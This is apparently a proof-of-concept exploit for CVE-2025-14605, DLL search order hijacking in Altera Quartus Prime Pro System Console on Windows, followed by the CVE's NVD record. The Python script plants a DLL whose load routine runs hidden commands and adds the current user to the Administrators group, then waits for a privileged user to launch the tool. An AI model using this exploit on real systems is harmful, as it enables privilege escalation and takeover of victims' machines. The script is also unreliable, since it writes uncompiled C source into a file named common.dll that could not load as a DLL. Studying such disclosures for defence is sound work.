CVE-2025-14605

# CVE-2025-14605 PoC - Search Order Hijacking # Target: Altera Quartus Prime Pro System Console (Windows) # Affected Versions: 17.0 through 25.1.1 import os import shutil import ctypes from ctypes import wintypes # Malicious DLL that will be planted MALICIOUS_DLL = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create reverse shell or execute payload WinExec("cmd.exe /c whoami > C:\\\\Temp\\\\poc_output.txt", SW_HIDE); // Alternatively, add current user to Administrators group system("net localgroup Administrators %USERNAME% /add"); } return TRUE; } ''' def create_malicious_dll(dll_path): """Generate malicious DLL for exploitation""" with open(dll_path, 'w') as f: f.write(MALICIOUS_DLL) print(f"[+] Created malicious DLL at: {dll_path}") def get_quartus_search_paths(): """Identify Quartus Prime search paths vulnerable to hijacking""" quartus_paths = [ os.path.expandvars(r'%APPDATA%\\Altera\\QuartusPrime\\'), os.path.expandvars(r'%LOCALAPPDATA%\\Altera\\QuartusPrime\\'), os.path.expandvars(r'%PROGRAMDATA%\\Altera\\QuartusPrime\\'), ] # System Console specific paths system_console_paths = [ r'C:\\Program Files\\Altera\\QuartusPrime\\pro\\bin\\', r'C:\\Program Files\\Altera\\QuartusPrime\\pro\\bin64\\', ] return quartus_paths + system_console_paths def plant_dll(target_dir, dll_name="common.dll"): """Plant malicious DLL in Quartus search path""" dll_path = os.path.join(target_dir, dll_name) create_malicious_dll(dll_path) print(f"[+] DLL planted in: {dll_path}") print("[!] Wait for privileged user to launch Quartus Prime System Console") return dll_path def exploit(): """Main exploitation routine""" print("=== CVE-2025-14605 Search Order Hijacking PoC ===") print("[*] Target: Altera Quartus Prime Pro System Console") print("[*] Method: DLL Search Order Hijacking") # Identify vulnerable paths paths = get_quartus_search_paths() for path in paths: if os.path.exists(path): print(f"[+] Found writable Quartus path: {path}") plant_dll(path) break else: print("[-] No writable Quartus paths found") print("[*] Manual exploitation: Place DLL in Quartus installation directory") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-14605", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T02:02:59.913", "lastModified": "2026-01-12T15:16:40.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Pro on Windows (System Console modules) allows Search Order Hijacking.This issue affects Quartus Prime Pro: from 17.0 through 25.1.1."}, {"lang": "es", "value": "Una vulnerabilidad de Elemento de Ruta de Búsqueda No Controlado en Altera Quartus Prime Pro en Windows (módulos de la Consola del Sistema) permite el Secuestro del Orden de Búsqueda. Este problema afecta a Quartus Prime Pro: desde la versión 17.0 hasta la 25.1.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:pro:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "25.1.1", "matchCriteriaId": "3DA2B70E-9364-4349-8107-E0A888CB9878"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0004", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}